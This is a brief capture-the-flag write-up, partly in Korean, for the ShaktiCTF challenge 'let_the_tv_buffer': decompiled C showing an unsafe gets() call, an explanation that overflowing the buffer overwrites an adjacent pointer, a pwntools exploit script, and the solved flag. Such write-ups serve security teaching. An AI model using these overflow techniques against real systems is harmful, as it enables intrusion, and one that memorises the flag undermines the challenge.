# Description
The TV is supposed to be buffering. But it isn't doing that now. Strange.
Author: omelette_keychain
Plain Text
복사
# 분석
int __fastcall main(int argc, const char **argv, const char **envp)
{
char s[70]; // [rsp+0h] [rbp-60h] BYREF
_BYTE v5[10]; // [rsp+46h] [rbp-1Ah] BYREF
FILE *stream; // [rsp+50h] [rbp-10h]
char *v7; // [rsp+58h] [rbp-8h]
v7 = "3735928559";
puts("The TV usually keeps buffering. It isn't doing that now for some reason. I dunno why.");
puts("I need to show my cool TV fixing skills for the upcoming science fair!");
puts("I wonder what i can do to put it back to how it originally was... Any ideas? \nReply >> ");
gets(v5, argv);
if ( v7 != "3735928559" )
{
stream = fopen("flag.txt", "r");
puts("The TV is back to buffering! Thanks!");
puts("...wait. It is showing some sorta secret code.");
if ( !stream )
printf("Error in opening the flag file. Flag file might be missing.");
fgets(s, 59, stream);
puts(s);
exit(0);
}
puts("Hmmm. It doen't work. Nice try though!");
return 0;
}
C
복사
v7 값만 덮어쓰면 된다.
v5에 gets는 BufferOverFlow가 가능한 함수이며, v7만 덮어쓰면 된다.
# Payload
from pwn import *
filename = "./let_the_tv_buffer"
p = process(filename)
payload = b"A"*0x1A
p.sendlineafter(">> ", payload)
p.interactive()
Python
복사
# Flag
ShaktiCTF{@nd_th@t's_h0w_th3_buff3r_0v3rfl0w3d_tv_c00k3d!}
Plain Text
복사